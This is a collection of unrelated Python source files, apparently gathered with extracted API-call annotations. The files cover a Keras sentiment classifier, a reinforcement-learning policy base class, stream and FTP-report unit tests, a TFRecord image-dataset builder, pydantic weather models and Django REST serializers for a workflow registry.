print("X_test.shape: " + str(X_test.shape))
print("Y_test.shape: " + str(Y_test.shape))
print("embedding_matrix.shape: " + str(embedding_matrix.shape))
# Create model
#model = model_factory.create_baseline_model(embedding_matrix, INPUT_LENGTH)
model = model_factory.create_rnn_model(embedding_matrix, INPUT_LENGTH)
#model = model_factory.create_bidir_rnn_model(embedding_matrix, INPUT_LENGTH)
#model = model_factory.create_train_emb_rnn_model(embedding_matrix, INPUT_LENGTH)
model.summary()
# Train model
model.fit(X_train, Y_train, batch_size=200, epochs=30)
# Evaluate model on validation set
val_loss, val_accuracy = model.evaluate(X_val, Y_val, verbose=0)
print("Accuracy on validation set: " + str(val_accuracy * 100) + "%")
# Evaluate model on test set
test_loss, test_accuracy = model.evaluate(X_test, Y_test, verbose=0)
print("Accuracy on test set: " + str(test_accuracy * 100) + "%")
# Test model on my own texts
reviews = [
"This movie is bad. I don't like it it all. It's terrible.",
"I love this movie. I've seen it many times and it's still awesome.",
"I don't think this movie is as bad as most people say. It's actually pretty good."
]
print("Testing model on my own texts:")
print(reviews)
reviews = tokenizer.texts_to_sequences(reviews)
reviews = pad_sequences(reviews, maxlen=INPUT_LENGTH, padding="post")
reviews = np.array(reviews)
pred = model.predict(reviews)
print(pred)
print("The model predicts:")
sentiment_str = "Negative" if pred[0][0] < 0.5 else "Positive"
print(sentiment_str + " on the first text")
sentiment_str = "Negative" if pred[1][0] < 0.5 else "Positive"
print(sentiment_str + " on the second text")
sentiment_str = "Negative" if pred[2][0] < 0.5 else "Positive"
print(sentiment_str + " on the third text")
| [
"keras.preprocessing.sequence.pad_sequences",
"sc_utils.load_data",
"sc_utils.create_embedding_matrix",
"numpy.array",
"model_factory.create_rnn_model",
"sc_utils.preprocess_data"
] | [((229, 249), 'sc_utils.load_data', 'sc_utils.load_data', ([], {}), '()\n', (247, 249), False, 'import sc_utils\n'), ((310, 382), 'sc_utils.preprocess_data', 'sc_utils.preprocess_data', (['X_train', 'Y_train', 'X_test', 'Y_test', 'INPUT_LENGTH'], {}), '(X_train, Y_train, X_test, Y_test, INPUT_LENGTH)\n', (334, 382), False, 'import sc_utils\n'), ((402, 445), 'sc_utils.create_embedding_matrix', 'sc_utils.create_embedding_matrix', (['tokenizer'], {}), '(tokenizer)\n', (434, 445), False, 'import sc_utils\n'), ((876, 938), 'model_factory.create_rnn_model', 'model_factory.create_rnn_model', (['embedding_matrix', 'INPUT_LENGTH'], {}), '(embedding_matrix, INPUT_LENGTH)\n', (906, 938), False, 'import model_factory\n'), ((1908, 1967), 'keras.preprocessing.sequence.pad_sequences', 'pad_sequences', (['reviews'], {'maxlen': 'INPUT_LENGTH', 'padding': '"""post"""'}), "(reviews, maxlen=INPUT_LENGTH, padding='post')\n", (1921, 1967), False, 'from keras.preprocessing.sequence import pad_sequences\n'), ((1978, 1995), 'numpy.array', 'np.array', (['reviews'], {}), '(reviews)\n', (1986, 1995), True, 'import numpy as np\n')] |
#Copyright (c) 2019 Uber Technologies, Inc.
#
#Licensed under the Uber Non-Commercial License (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at the root directory of this project.
#
#See the License for the specific language governing permissions and
#limitations under the License.
import pickle
class Policy:
needs_stats = False
def seed(self, seed):
pass
def act(self, states):
raise NotImplementedError()
def reset(self):
pass
def supp_fitness(self): # pylint: disable=no-self-use
return 0.0
def set_theta(self, theta):
raise NotImplementedError()
def _serialize(self, *args, **kwargs): # pylint: disable=no-self-use
frame = pickle.dumps((args, kwargs))
return [frame]
@classmethod
def deserialize(cls, frames):
args, kwargs = pickle.loads(frames[0])
return cls(*args, **kwargs)
| [
"pickle.loads",
"pickle.dumps"
] | [((790, 818), 'pickle.dumps', 'pickle.dumps', (['(args, kwargs)'], {}), '((args, kwargs))\n', (802, 818), False, 'import pickle\n'), ((917, 940), 'pickle.loads', 'pickle.loads', (['frames[0]'], {}), '(frames[0])\n', (929, 940), False, 'import pickle\n')] |
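
A minimal concrete policy built on the base class above, showing the two methods subclasses are expected to provide (act and set_theta) and the _serialize/deserialize round trip. The constant-action behaviour is purely illustrative.

class ConstantPolicy(Policy):
    def __init__(self, action=0):
        self.action = action
        # keep the constructor arguments so the policy can be rebuilt elsewhere
        self.frames = self._serialize(action)

    def act(self, states):
        return [self.action for _ in states]

    def set_theta(self, theta):
        self.theta = theta

policy = ConstantPolicy(action=1)
clone = ConstantPolicy.deserialize(policy.frames)   # rebuilds ConstantPolicy(1)
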
import unittest
import rx
class History(rx.Stream):
def __init__(self):
self.events = []
super().__init__()
def notify(self, value):
self.events.append(value)
class TestRx(unittest.TestCase):
def test_combine_streams(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset(
clicks,
accumulator=lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
indices.emit(20)
clicks.emit(+0)
indices.emit(30)
clicks.emit(+1)
result = history.events
expect = [20, 31]
self.assertEqual(expect, result)
def test_combine_streams_with_seed_values(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset_emit_seed(
clicks, lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
indices.emit(20)
indices.emit(30)
result = history.events
expect = [10, 20, 30]
self.assertEqual(expect, result)
def test_general_case(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset_emit_seed(
clicks, lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
clicks.emit(1)
clicks.emit(-1)
indices.emit(20)
clicks.emit(1)
indices.emit(30)
clicks.emit(-1)
result = history.events
expect = [10, 11, 10, 20, 21, 30, 29]
self.assertEqual(expect, result)
| [
"rx.Stream",
"rx.scan_reset",
"rx.scan_reset_emit_seed"
] | [((282, 293), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (291, 293), False, 'import rx\n'), ((312, 323), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (321, 323), False, 'import rx\n'), ((341, 409), 'rx.scan_reset', 'rx.scan_reset', (['clicks'], {'accumulator': '(lambda a, i: a + i)', 'reset': 'indices'}), '(clicks, accumulator=lambda a, i: a + i, reset=indices)\n', (354, 409), False, 'import rx\n'), ((815, 826), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (824, 826), False, 'import rx\n'), ((845, 856), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (854, 856), False, 'import rx\n'), ((874, 940), 'rx.scan_reset_emit_seed', 'rx.scan_reset_emit_seed', (['clicks', '(lambda a, i: a + i)'], {'reset': 'indices'}), '(clicks, lambda a, i: a + i, reset=indices)\n', (897, 940), False, 'import rx\n'), ((1267, 1278), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (1276, 1278), False, 'import rx\n'), ((1297, 1308), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (1306, 1308), False, 'import rx\n'), ((1326, 1392), 'rx.scan_reset_emit_seed', 'rx.scan_reset_emit_seed', (['clicks', '(lambda a, i: a + i)'], {'reset': 'indices'}), '(clicks, lambda a, i: a + i, reset=indices)\n', (1349, 1392), False, 'import rx\n')] |
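The rx module under test is not included in this dump. The following is a minimal sketch of Stream, scan_reset and scan_reset_emit_seed that would satisfy the three tests above; the helper class names and the dictionary-based state are assumptions, and the real implementation may differ.

class Stream:
    def __init__(self):
        self.subscribers = []

    def register(self, subscriber):
        self.subscribers.append(subscriber)

    def emit(self, value):
        for subscriber in self.subscribers:
            subscriber.notify(value)

    def notify(self, value):
        # A plain Stream used as a subscriber simply forwards values downstream.
        self.emit(value)


def scan_reset(stream, accumulator, reset, emit_seed=False):
    out = Stream()
    state = {"acc": None}

    class _OnReset:
        def notify(self, seed):
            state["acc"] = seed
            if emit_seed:
                out.emit(seed)

    class _OnValue:
        def notify(self, value):
            state["acc"] = accumulator(state["acc"], value)
            out.emit(state["acc"])

    reset.register(_OnReset())
    stream.register(_OnValue())
    return out


def scan_reset_emit_seed(stream, accumulator, reset):
    return scan_reset(stream, accumulator, reset, emit_seed=True)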
from modules.visitor.symbol_table import SymbolTable
from .ast_node import ASTNode
from .if_node import IfNode
class LineNode(ASTNode):
def __init__(self, expression, depth, no_end = False):
self.expression = expression
self.depth = depth
self.no_end = no_end
super().__init__(expression.position)
def __repr__(self):
return f"[{self.expression}]"
def interpret(self, interpreter):
return self.get_expression(interpreter)
def transpile(self, transpiler):
transpiler.depth = self.depth
expression = self.get_expression(transpiler)
indent = "\t" * self.depth
return f"{indent}{expression}{'' if self.no_end else ';'}\n"
def get_expression(self, visitor):
if isinstance(self.expression, IfNode):
visitor.symbol_table = SymbolTable(visitor.symbol_table)
expression = self.expression.visit(visitor)
visitor.symbol_table = visitor.symbol_table.parent
return expression
return self.expression.visit(visitor)
| [
"modules.visitor.symbol_table.SymbolTable"
] | [((843, 876), 'modules.visitor.symbol_table.SymbolTable', 'SymbolTable', (['visitor.symbol_table'], {}), '(visitor.symbol_table)\n', (854, 876), False, 'from modules.visitor.symbol_table import SymbolTable\n')] |
from __future__ import absolute_import
from erlpack import pack
def test_nil():
assert pack(None) == b'\x83s\x03nil'
| [
"erlpack.pack"
] | [((93, 103), 'erlpack.pack', 'pack', (['None'], {}), '(None)\n', (97, 103), False, 'from erlpack import pack\n')] |
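A companion check derived from the byte string asserted above: 0x83 is the external-term-format version byte, b's' tags a small atom, 0x03 is the atom length and b'nil' is the atom text. Added here as an illustrative sketch only.

def test_nil_layout():
    data = pack(None)
    assert data[0] == 0x83     # ETF version byte
    assert data[1:2] == b's'   # small-atom tag
    assert data[2] == 3        # atom length
    assert data[3:] == b'nil'  # atom text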
import unittest
import operative
import datetime
from caliendo.patch import patch
from caliendo import expected_value
from nose.tools import eq_, ok_
from operative.settings import TEST_FTP_LOGIN
class ReportTest(unittest.TestCase):
"""
Test the various reports.
"""
@patch('operative.FTPConnection.get_files')
@patch('operative.FTPConnection._establish_connection')
@patch('operative.FTPConnection._close_connection')
def test_line_item_report(self):
"""
Test LineItemReport
"""
from operative.reports.line_item_report import LineItemReport
def __get_and_test(path, since):
ftp_creds = operative.FTPCredentials(**TEST_FTP_LOGIN)
line_item_reports = LineItemReport().get_report_files(ftp_credentials=ftp_creds, ftp_path=path, since=since)
for lir in line_item_reports:
observed_value = str(lir.data[0])
eq_(expected_value.get_or_store(observed_value), observed_value)
# get all files
__get_and_test(path='/flatfile', since=None)
# get one file - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 1, 7, 0, 42))
# get zero files - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 2, 1))
# get zero files - only directories in path
__get_and_test(path='/', since=None)
| [
"caliendo.expected_value.get_or_store",
"datetime.datetime",
"operative.reports.line_item_report.LineItemReport",
"caliendo.patch.patch",
"operative.FTPCredentials"
] | [((290, 332), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection.get_files"""'], {}), "('operative.FTPConnection.get_files')\n", (295, 332), False, 'from caliendo.patch import patch\n'), ((338, 392), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection._establish_connection"""'], {}), "('operative.FTPConnection._establish_connection')\n", (343, 392), False, 'from caliendo.patch import patch\n'), ((398, 448), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection._close_connection"""'], {}), "('operative.FTPConnection._close_connection')\n", (403, 448), False, 'from caliendo.patch import patch\n'), ((675, 717), 'operative.FTPCredentials', 'operative.FTPCredentials', ([], {}), '(**TEST_FTP_LOGIN)\n', (699, 717), False, 'import operative\n'), ((1177, 1213), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(1)', '(7)', '(0)', '(42)'], {}), '(2014, 1, 7, 0, 42)\n', (1194, 1213), False, 'import datetime\n'), ((1304, 1333), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(2)', '(1)'], {}), '(2014, 2, 1)\n', (1321, 1333), False, 'import datetime\n'), ((750, 766), 'operative.reports.line_item_report.LineItemReport', 'LineItemReport', ([], {}), '()\n', (764, 766), False, 'from operative.reports.line_item_report import LineItemReport\n'), ((951, 994), 'caliendo.expected_value.get_or_store', 'expected_value.get_or_store', (['observed_value'], {}), '(observed_value)\n', (978, 994), False, 'from caliendo import expected_value\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import io
import os
import random
from PIL import Image, ImageStat
import tensorflow as tf
from datasets import dataset_utils
flags = tf.app.flags
flags.DEFINE_string('dataset_dir',
'/home/ace19/dl_data/materials',
'Root Directory to dataset.')
flags.DEFINE_string('output_path',
'/home/ace19/dl_data/materials/query.record',
'Path to output TFRecord')
flags.DEFINE_string('dataset_category',
'query',
'dataset category, train|validation|test')
FLAGS = flags.FLAGS
def get_label_map(label_to_index):
label_map = {}
# cls_lst = os.listdir(FLAGS.dataset_dir)
cls_path = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(cls_path)
for i, cls in enumerate(cls_lst):
data_path = os.path.join(cls_path, cls)
img_lst = os.listdir(data_path)
for n, img in enumerate(img_lst):
img_path = os.path.join(data_path, img)
label_map[img_path] = label_to_index[cls]
return label_map
def dict_to_tf_example(image_name,
dataset_directory,
label_map=None,
image_subdirectory='train'):
"""
Args:
    image_name: file name of a single image inside dataset_directory.
    dataset_directory: path to the directory holding the image file.
    label_map: a map from full image paths to integer class ids.
    image_subdirectory: string specifying the dataset split subdirectory
      holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by image is not a valid PNG
"""
# full_path = os.path.join(dataset_directory, image_subdirectory, image_name)
full_path = os.path.join(dataset_directory, image_name)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded = fid.read()
encoded_io = io.BytesIO(encoded)
image = Image.open(encoded_io)
width, height = image.size
format = image.format
image_stat = ImageStat.Stat(image)
mean = image_stat.mean
std = image_stat.stddev
key = hashlib.sha256(encoded).hexdigest()
# if image_subdirectory.lower() == 'test':
# label = -1
# else:
# label = int(label_map[image_name])
label = int(label_map[full_path])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_utils.int64_feature(height),
'image/width': dataset_utils.int64_feature(width),
'image/filename': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/fullpath': dataset_utils.bytes_feature(full_path.encode('utf8')),
'image/source_id': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/key/sha256': dataset_utils.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_utils.bytes_feature(encoded),
'image/format': dataset_utils.bytes_feature(format.encode('utf8')),
'image/class/label': dataset_utils.int64_feature(label),
# 'image/text': dataset_util.bytes_feature('label_text'.encode('utf8'))
'image/mean': dataset_utils.float_list_feature(mean),
'image/std': dataset_utils.float_list_feature(std)
}))
return example
def main(_):
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
options = tf.io.TFRecordOptions(tf.io.TFRecordCompressionType.GZIP)
writer = tf.io.TFRecordWriter(FLAGS.output_path, options=options)
# cls_lst = os.listdir(FLAGS.dataset_dir)
dataset_lst = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(dataset_lst)
cls_lst.sort()
label_to_index = {}
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
if os.path.isdir(cls_path):
label_to_index[cls] = i
label_map = get_label_map(label_to_index)
random.shuffle(cls_lst)
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
img_lst = os.listdir(cls_path)
total = len(img_lst)
for idx, image in enumerate(img_lst):
if idx % 100 == 0:
tf.compat.v1.logging.info('On image %d of %d', idx, total)
tf_example = dict_to_tf_example(image, cls_path, label_map, FLAGS.dataset_category)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.compat.v1.app.run()
| [
"os.listdir",
"io.BytesIO",
"datasets.dataset_utils.int64_feature",
"os.path.isdir",
"random.shuffle",
"PIL.Image.open",
"tensorflow.compat.v1.logging.info",
"hashlib.sha256",
"datasets.dataset_utils.bytes_feature",
"tensorflow.compat.v1.logging.set_verbosity",
"datasets.dataset_utils.float_list_feature",
"tensorflow.io.TFRecordOptions",
"tensorflow.io.TFRecordWriter",
"os.path.join",
"PIL.ImageStat.Stat",
"tensorflow.compat.v1.app.run",
"tensorflow.io.gfile.GFile"
] | [((832, 887), 'os.path.join', 'os.path.join', (['FLAGS.dataset_dir', 'FLAGS.dataset_category'], {}), '(FLAGS.dataset_dir, FLAGS.dataset_category)\n', (844, 887), False, 'import os\n'), ((902, 922), 'os.listdir', 'os.listdir', (['cls_path'], {}), '(cls_path)\n', (912, 922), False, 'import os\n'), ((1947, 1990), 'os.path.join', 'os.path.join', (['dataset_directory', 'image_name'], {}), '(dataset_directory, image_name)\n', (1959, 1990), False, 'import os\n'), ((2089, 2108), 'io.BytesIO', 'io.BytesIO', (['encoded'], {}), '(encoded)\n', (2099, 2108), False, 'import io\n'), ((2121, 2143), 'PIL.Image.open', 'Image.open', (['encoded_io'], {}), '(encoded_io)\n', (2131, 2143), False, 'from PIL import Image, ImageStat\n'), ((2218, 2239), 'PIL.ImageStat.Stat', 'ImageStat.Stat', (['image'], {}), '(image)\n', (2232, 2239), False, 'from PIL import Image, ImageStat\n'), ((3467, 3528), 'tensorflow.compat.v1.logging.set_verbosity', 'tf.compat.v1.logging.set_verbosity', (['tf.compat.v1.logging.INFO'], {}), '(tf.compat.v1.logging.INFO)\n', (3501, 3528), True, 'import tensorflow as tf\n'), ((3544, 3601), 'tensorflow.io.TFRecordOptions', 'tf.io.TFRecordOptions', (['tf.io.TFRecordCompressionType.GZIP'], {}), '(tf.io.TFRecordCompressionType.GZIP)\n', (3565, 3601), True, 'import tensorflow as tf\n'), ((3615, 3671), 'tensorflow.io.TFRecordWriter', 'tf.io.TFRecordWriter', (['FLAGS.output_path'], {'options': 'options'}), '(FLAGS.output_path, options=options)\n', (3635, 3671), True, 'import tensorflow as tf\n'), ((3737, 3792), 'os.path.join', 'os.path.join', (['FLAGS.dataset_dir', 'FLAGS.dataset_category'], {}), '(FLAGS.dataset_dir, FLAGS.dataset_category)\n', (3749, 3792), False, 'import os\n'), ((3807, 3830), 'os.listdir', 'os.listdir', (['dataset_lst'], {}), '(dataset_lst)\n', (3817, 3830), False, 'import os\n'), ((4086, 4109), 'random.shuffle', 'random.shuffle', (['cls_lst'], {}), '(cls_lst)\n', (4100, 4109), False, 'import random\n'), ((4626, 4648), 'tensorflow.compat.v1.app.run', 'tf.compat.v1.app.run', ([], {}), '()\n', (4646, 4648), True, 'import tensorflow as tf\n'), ((981, 1008), 'os.path.join', 'os.path.join', (['cls_path', 'cls'], {}), '(cls_path, cls)\n', (993, 1008), False, 'import os\n'), ((1027, 1048), 'os.listdir', 'os.listdir', (['data_path'], {}), '(data_path)\n', (1037, 1048), False, 'import os\n'), ((2000, 2034), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['full_path', '"""rb"""'], {}), "(full_path, 'rb')\n", (2017, 2034), True, 'import tensorflow as tf\n'), ((3931, 3961), 'os.path.join', 'os.path.join', (['dataset_lst', 'cls'], {}), '(dataset_lst, cls)\n', (3943, 3961), False, 'import os\n'), ((3973, 3996), 'os.path.isdir', 'os.path.isdir', (['cls_path'], {}), '(cls_path)\n', (3986, 3996), False, 'import os\n'), ((4167, 4197), 'os.path.join', 'os.path.join', (['dataset_lst', 'cls'], {}), '(dataset_lst, cls)\n', (4179, 4197), False, 'import os\n'), ((4216, 4236), 'os.listdir', 'os.listdir', (['cls_path'], {}), '(cls_path)\n', (4226, 4236), False, 'import os\n'), ((1114, 1142), 'os.path.join', 'os.path.join', (['data_path', 'img'], {}), '(data_path, img)\n', (1126, 1142), False, 'import os\n'), ((2305, 2328), 'hashlib.sha256', 'hashlib.sha256', (['encoded'], {}), '(encoded)\n', (2319, 2328), False, 'import hashlib\n'), ((4360, 4418), 'tensorflow.compat.v1.logging.info', 'tf.compat.v1.logging.info', (['"""On image %d of %d"""', 'idx', 'total'], {}), "('On image %d of %d', idx, total)\n", (4385, 4418), True, 'import tensorflow as tf\n'), ((2597, 2632), 
'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['height'], {}), '(height)\n', (2624, 2632), False, 'from datasets import dataset_utils\n'), ((2657, 2691), 'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['width'], {}), '(width)\n', (2684, 2691), False, 'from datasets import dataset_utils\n'), ((3041, 3077), 'datasets.dataset_utils.bytes_feature', 'dataset_utils.bytes_feature', (['encoded'], {}), '(encoded)\n', (3068, 3077), False, 'from datasets import dataset_utils\n'), ((3184, 3218), 'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['label'], {}), '(label)\n', (3211, 3218), False, 'from datasets import dataset_utils\n'), ((3322, 3360), 'datasets.dataset_utils.float_list_feature', 'dataset_utils.float_list_feature', (['mean'], {}), '(mean)\n', (3354, 3360), False, 'from datasets import dataset_utils\n'), ((3383, 3420), 'datasets.dataset_utils.float_list_feature', 'dataset_utils.float_list_feature', (['std'], {}), '(std)\n', (3415, 3420), False, 'from datasets import dataset_utils\n')] |
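A sketch of how the records written above could be read back. The feature keys mirror the ones written in dict_to_tf_example, but this snippet is an added illustration and was not part of the original script.

def parse_example(serialized):
    # Only the subset of features needed for a typical training pipeline.
    features = {
        'image/encoded': tf.io.FixedLenFeature([], tf.string),
        'image/class/label': tf.io.FixedLenFeature([], tf.int64),
        'image/height': tf.io.FixedLenFeature([], tf.int64),
        'image/width': tf.io.FixedLenFeature([], tf.int64),
    }
    parsed = tf.io.parse_single_example(serialized, features)
    image = tf.image.decode_image(parsed['image/encoded'], channels=3)
    return image, parsed['image/class/label']

dataset = tf.data.TFRecordDataset(FLAGS.output_path, compression_type='GZIP')
dataset = dataset.map(parse_example)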
from pydantic import BaseModel, Field
from app.shared.enums import Units
class LocationBase(BaseModel):
units: Units = Units.METRIC
class CityLocation(BaseModel):
city: str
state: str | None = Field(default=None, max_length=3)
country: str | None = None
class Config:
schema_extra = {
"example": {
"city": "gothenburg"
}
}
class CoordsLocation(LocationBase):
lat: float
lon: float
class Config:
schema_extra = {
"example": {
"lat": "50",
"lon": "30"
}
}
class WeatherOut(BaseModel):
temperature: str
units: Units
city: str | None = None
country: str | None = None
weather: str | None = None
lat: float | None = None
lon: float | None = None
| [
"pydantic.Field"
] | [((210, 243), 'pydantic.Field', 'Field', ([], {'default': 'None', 'max_length': '(3)'}), '(default=None, max_length=3)\n', (215, 243), False, 'from pydantic import BaseModel, Field\n')] |
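A small usage sketch for the models above; the field values are made up for illustration.

if __name__ == "__main__":
    city = CityLocation(city="gothenburg", country="SE")
    print(city.city, city.state, city.country)  # state stays None

    coords = CoordsLocation(lat=50, lon=30)
    print(coords.units)  # defaults to Units.METRIC from LocationBase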
# Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from models import WorkspaceItem
from models import Workspace
from models import PESig
from models import FunctionSig
from models import LiteralSig
from models import PEImplementation
from models import FnImplementation
from models import RegistryUserGroup
from models import Connection
from models import FunctionParameter
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from rest_framework import serializers
from vercereg.utils import get_base_rest_uri
##############################################################################
class UserSerializer(serializers.HyperlinkedModelSerializer):
def get_reg_groups(self, obj):
toret = []
request = self.context.get('request')
for v in obj.groups.values():
group_id = v['id']
g = Group.objects.get(id=group_id)
try:
rug_instance = RegistryUserGroup.objects.get(group=g)
rug = (get_base_rest_uri(request) + 'registryusergroups/' +
str(rug_instance.id) + '/')
toret.append(rug)
except RegistryUserGroup.DoesNotExist:
pass
return toret
groups = serializers.SerializerMethodField('get_reg_groups')
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class Meta:
model = User
fields = (
'url',
'username',
'email',
'first_name',
'last_name',
'password',
'groups',
'ownsgroups')
write_only_fields = ('password',)
read_only_fields = ('ownsgroups',)
# class UserUpdateSerializer(serializers.HyperlinkedModelSerializer):
# groups = serializers.SerializerMethodField('get_reg_groups')
#
# def get_reg_groups(self, obj):
# toret = []
# request = self.context.get('request')
# for v in obj.groups.values():
# group_id = v['id']
# g = Group.objects.get(id=group_id)
# try:
# rug_instance = RegistryUserGroup.objects.get(group=g)
# rug = get_base_rest_uri(request) + 'registryusergroups/' +
# str(rug_instance.id) + '/'
# toret.append(rug)
# except RegistryUserGroup.DoesNotExist:
# pass
# return toret
#
# def restore_object(self, attrs, instance=None):
# user = super(UserUpdateSerializer, self).restore_object(attrs, instance)
# user.set_password(attrs['password'])
# return user
#
# class Meta:
# model = User
# fields = ('username', 'email', 'first_name', 'last_name', 'password',
# 'groups', 'ownsgroups',)
# write_only_fields = ('password',)
# read_only_fields = ('username',)
##############################################################################
class RegistryUserGroupSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
    # FIXME: The following is excluded as it breaks django rest for some reason.
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', 'owner', )
class RegistryUserGroupPutSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# ownerusername = serializers.CharField(source='get_owner_username',
# read_only=True)
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', )
##############################################################################
# class AdminRegistryUserGroupSerializer
# (serializers.HyperlinkedModelSerializer):
# group_name = serializers.CharField(source='get_group_name')#,
# read_only=True)
# owner_username = serializers.CharField(source='get_owner_username',
# read_only=True)
#
# class Meta:
# model = RegistryUserGroup
# fields = ('url', 'group_name', 'owner_username',
# 'group', 'owner', 'description')
# read_only_fields = ('group', )
##############################################################################
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('name',)
##############################################################################
class PEImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PEImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class FnImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FnImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class WorkspaceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Workspace
depth = 0
fields = ('id', 'url', 'name', 'owner', 'description',
'clone_of', 'creation_date')
read_only_fields = ('owner', 'creation_date',)
##############################################################################
class WorkspaceDeepSerializer(serializers.HyperlinkedModelSerializer):
pes = serializers.CharField(source='get_pesigs')
functions = serializers.CharField(source='get_fnsigs')
literals = serializers.CharField(source='get_literalsigs')
peimplementations = serializers.CharField(source='get_peimplementations')
fnimplementations = serializers.CharField(source='get_fnimplementations')
class Meta:
model = Workspace
# TODO (nice-to-have) revisit the depth issue, user serialization is
# not good enough - disabled for now.
depth = 0
read_only_fields = ('owner', 'creation_date')
def transform_pes(self, obj, value):
request = self.context.get('request')
pes = obj.pesig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'pes/' +
str(p.id), pes)
def transform_functions(self, obj, value):
request = self.context.get('request')
fns = obj.functionsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'functions/' +
str(p.id), fns)
def transform_literals(self, obj, value):
request = self.context.get('request')
lits = obj.literalsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'literals/' +
str(p.id), lits)
def transform_peimplementations(self, obj, value):
request = self.context.get('request')
peimpls = obj.peimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'peimpls/' +
str(p.id), peimpls)
def transform_fnimplementations(self, obj, value):
request = self.context.get('request')
fnimpls = obj.fnimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'fnimpls/' +
str(p.id), fnimpls)
##############################################################################
class PESigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PESig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'connections',
'creation_date',
'peimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class ConnectionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Connection
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
class FunctionParameterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FunctionParameter
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
##############################################################################
class FunctionSigSerializer(serializers.HyperlinkedModelSerializer):
# implementations = serializers.WritableField
# (source='fnimplementation_set', required=False)
class Meta:
model = FunctionSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'creation_date',
'return_type',
'parameters',
'fnimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class LiteralSigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = LiteralSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'value',
'description',
'creation_date',
'clone_of')
read_only_fields = ('user', 'creation_date', )
| [
"rest_framework.serializers.SerializerMethodField",
"vercereg.utils.get_base_rest_uri",
"rest_framework.serializers.CharField",
"models.RegistryUserGroup.objects.get",
"django.contrib.auth.models.Group.objects.get"
